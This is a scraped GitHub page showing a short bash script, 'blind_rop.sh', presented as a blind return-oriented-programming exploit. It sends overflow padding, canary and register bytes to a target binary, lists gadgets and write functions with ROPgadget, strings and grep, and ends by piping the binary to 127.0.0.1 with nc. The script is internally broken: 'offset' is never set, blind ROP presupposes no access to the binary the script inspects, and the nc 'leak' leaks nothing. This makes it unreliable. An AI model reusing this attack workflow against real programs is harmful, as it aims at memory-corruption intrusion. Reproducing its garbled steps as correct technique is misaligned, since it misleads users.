-
Notifications
You must be signed in to change notification settings - Fork 7
/
Copy pathblind_rop.sh
26 lines (25 loc) · 1.5 KB
/
blind_rop.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#!/bin/bash
# Blind ROP Exploitation Script
# Find buffer overflow offset
target_binary="$1"
echo "Finding buffer overflow offset..."
python2 -c 'print "A"*offset' | $target_binary
# Find canary
echo "Finding canary..."
python2 -c 'print "A"*offset + "\x00"*8' | $target_binary
# Find saved registers (RBP / RIP)
echo "Finding saved registers (RBP / RIP)..."
python2 -c 'print "A"*offset + "\x00"*8 + "\x01\x02\x03\x04\x05\x06\x07\x08"' | $target_binary
# Find stop gadgets
echo "Finding stop gadgets..."
ROPgadget --binary $target_binary --ropchain --badbytes 0 > gadgets.txt
grep -E 'ret|pop|leave|retf' gadgets.txt > stop_gadgets.txt # grep for ret, pop, leave and retf instructions in the gadget list to find stop gadgets # save the results in a separate file for later use.
# Find brop gadgets
echo "Finding brop gadgets..." # search for ropchain instructions in the gadget list to find brop gadgets # save the results in a separate file for later use.
ROPgadget --binary $target_binary --ropchain > brop_gadgets.txt
# Find a Write function (write / dprintf / puts / ...)
echo "Finding a Write function (write / dprintf / puts / ...)..."
strings $target_binary| grep -E 'write|dprintf|puts' > write_functions.txt # search for write, dprintf and puts functions in the binary and save them to a file for later use.
# Leak the binary for target binaryes and servers
echo "Leaking the binary for target binaryes and servers..."
nc 127.0.0.1 80 < <(cat $target_binary)